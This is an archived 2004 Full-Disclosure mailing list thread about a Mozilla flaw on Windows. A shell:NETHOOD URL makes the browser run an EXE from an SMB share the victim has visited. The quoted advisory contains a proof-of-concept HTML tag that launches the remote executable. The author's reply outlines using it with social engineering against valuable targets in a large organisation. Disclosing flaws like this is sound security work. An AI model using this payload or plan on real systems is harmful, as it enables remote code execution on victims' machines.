[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] MOZILLA: SHELL can execute remote EXE program

To: "Barry Fitzgerald" <bkfsec@xxxxxxxxxxxxxxxx>, <liudieyu@xxxxxxxxxxxxx>
Subject: Re: [Full-Disclosure] MOZILLA: SHELL can execute remote EXE program
From: <liudieyu@xxxxxxxxxxxxx>
Date: Fri, 9 Jul 2004 14:49:23 -0000


Barry Fitzgerald <bkfsec@xxxxxxxxxxxxxxxx> said:

> 
> Interesting... I was trying to determine if the shell: exploit could be 
> used to execute remote code on a known web server but hadn't approached 
> it from the SMB angle.

the credit also goes to MALWARE and Cheng Peng Su who found SHELL-protocol URL
works on IE. as soon as i read the report at FD, i immediately recalled
NETHOOD and the whole adivsory came out in minutes. :-P

> 
> The obvious mitigating factor for this exploit is that someone would 
> need to have prior knowledge of which SMB shares had been visited by the 
> user, or otherwise try to manipulate those.   Unless a way to merge this 
> flaw with an automated method of placing this shortcut into the nethood 
> and controlling what content is on said share --  then this 
> vulnerability would almost definately not be usable in widespread exploit.
> 
> It could be a danger in situations where the cracker has prior knowledge 
> of the network environment, though.

this can used in penetration:
in a network of some large org, there are valuable targets who use mozilla and
careless guys. it's easy to compromise some careless guys' machines. then
trick the real valuable target to browse shared folder and use their MOZILLA
to view our webpage - these 2 steps can done easily with good social 
engineering.

at last, but not least, the SHELL-protocol issue was original posted at
BUGZILLA instead of FD:
http://bugzilla.mozilla.org/show_bug.cgi?id=250180

> 
>                 -Barry
> 
> 
> liudieyu@xxxxxxxxxxxxx wrote:
> 
> >SUBJ: MOZILLA: SHELL can execute remote EXE program
> >DATE: 2004/07/09
> >FROM: Liu Die Yu <liudieyu AT umbrella D0T name>
> >############################################################
> >[START] Advisory
> >############################################################
> >
> >COPYRIGHT
> >---------
> >This Advisory is Copyright (c) 2004 "Liu Die Yu". 
> >You may distribute it unmodified. 
> >You may not modify it and distribute it or distribute parts of it without the
> >author's written permission. 
> >( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )
> >
> >TESTED
> >------
> >MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7)
Gecko/20040616") 
> >running on winxp.en.home.sp1a.up2date.20040709
> >
> >PROCESS
> >-------
> >VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED
"X-6487ohu4s6x0p". 
> >THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER 
> >AT
> >"shell:NETHOOD"
> >
> >AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL:
> >shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe
> >
> >A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED.
> >
> >REFERENCE
> >---------
> >MOZILLA will open/execute a file when navigated to a valid SHELL-protocol 
> >url:
> >http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
> >greetingz fly to perrymonj.
> >
> >WINDOWS support "shell:NETHOOD":
> >http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
> >thanks to malware for his additional research , and Cheng Peng Su for his
> >original discovery.
> >
> >
> >
> >liudieyu
> >
> >http://umbrella.name
> >
> >############################################################
> >[START] PROOF OF CONCEPT
> >############################################################
> ><!-- 
> >MOZILLA REMOTE COMPROMISE DEMO
> >
> >REPLACE "[" WITH "<", and REPLACE "]" WITH ">".
> >
> >!!!!! WARNING !!!!!
> >THIS DEMO WILL NOT WORK WITHOUT PROPER MODIFICATION.
> >
> >PROCESS:
> >1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED
> >"X-6487ohu4s6x0p".
> >     THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE 
> > FOLDER
> >AT "shell:NETHOOD"
> >2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN 
> >THE
> >"shared" FOLDER.
> >
> >CREATED BY:
> >"Liu Die Yu" -> LIUDIEYU at UMBRELLA D0T NAME
> >
> >COPYRIGHT:
> >This Demo is Copyright (c) 2004 "Liu Die Yu". 
> >You may distribute it unmodified. 
> >You may not modify it and distribute it or distribute parts of it without the
> >author's written permission. 
> >( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )
> >-->
> >
> >[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]
> >
> >
> >_______________________________________________
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> >
> >  
> >
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 



-- 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- Re: [Full-Disclosure] MOZILLA: SHELL can execute remote EXE program
  - From: Barry Fitzgerald

Prev by Date: [Full-Disclosure] [ GLSA 200407-08 ] Ethereal: Multiple security problems
Next by Date: Re: [Full-Disclosure] No shell => secure?
Previous by thread: Re: [Full-Disclosure] MOZILLA: SHELL can execute remote EXE program
Next by thread: RE: [Full-Disclosure] Norton AntiVirus Scanner Remote Denial Of ServiceVulnerability [Part: !!!]
Index(es):
- Date
- Thread